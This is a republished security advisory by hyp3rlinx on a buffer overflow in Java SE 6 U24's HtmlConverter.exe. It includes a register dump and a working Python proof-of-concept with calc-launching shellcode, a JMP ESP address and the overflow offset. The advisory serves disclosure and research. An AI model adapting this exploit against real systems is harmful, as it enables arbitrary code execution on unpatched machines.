首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Java Platform SE 6 U24 HtmlConverter.exe Buffer Overflow
来源:hyp3rlinx.altervista.org 作者:hyp3rlinx 发布时间:2016-01-22  
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt



Vendor:
===============
www.oracle.com



Product:
========================================
Java Platform SE 6 U24 HtmlConverter.exe
Product Version: 6.0.240.50


The HTML Converter is part of Java SE binary part of the JDK and Allows web
page authors to explicitly target
the browsers and platforms used in their environment when modifying their
pages.



Vulnerability Type:
============================
Buffer Overflow




CVE Reference:
==============
N/A




Vulnerability Details:
=====================

When calling htmlConverter.exe with specially crafted payload it will cause
buffer overflow executing arbitrary attacker supplied code.
This was a small vulnerability included as part of the overall Oracle CPU
released on January 19, 2016.

Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html



registers ...

EAX FFFFFFFE
ECX FFFFFFFE
EDX 0008E3C8
EBX 7EFDE000
ESP 0018FEB4
EBP 0018FF88
ESI 00001DB1
EDI 00000000
EIP 52525252                          <-------- "RRRR" \x52
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0



Exploit code(s):
===============

###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "
 #EIP @ 2493
pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "
#EIP 2469 - 2479

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


#JMP ESP kernel32.dll
rp=struct.pack('<L', 0x76E72E2B)


payload="A"*2469+rp+"\x90"*10+sc
subprocess.Popen([pgm, payload], shell=False)


Disclosure Timeline:
=====================================
Vendor Notification: August 28, 2015
January 20, 2016  : Public Disclosure



Exploitation Technique:
=======================
Local



Severity Level:
===============
Medium



Description:
=============================================================

Vulnerable Product:     [+] Java SE 6 U24 HtmlConverter.exe

=============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BlueControl 3.5 SR5 Insecure L
·xWPE 1.5.30a-2.1 - Local Buffe
·Art Systems FluidDraw P5/S5 5.
·Linux Kernel REFCOUNT Overflow
·Android ADB Debug Server Remot
·NetSchedScan 1.0 - Crash PoC
·FreeBSD SCTP ICMPv6 Error Proc
·Amanda <= 3.3.1 - amstar Comma
·Buffalo NAS Remote Shutdown
·SevOne NMS <= 5.3.6.0 - Remote
·Linux Kernel - prima WLAN Driv
·WhatsUp Gold 16.3 - Unauthenti
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved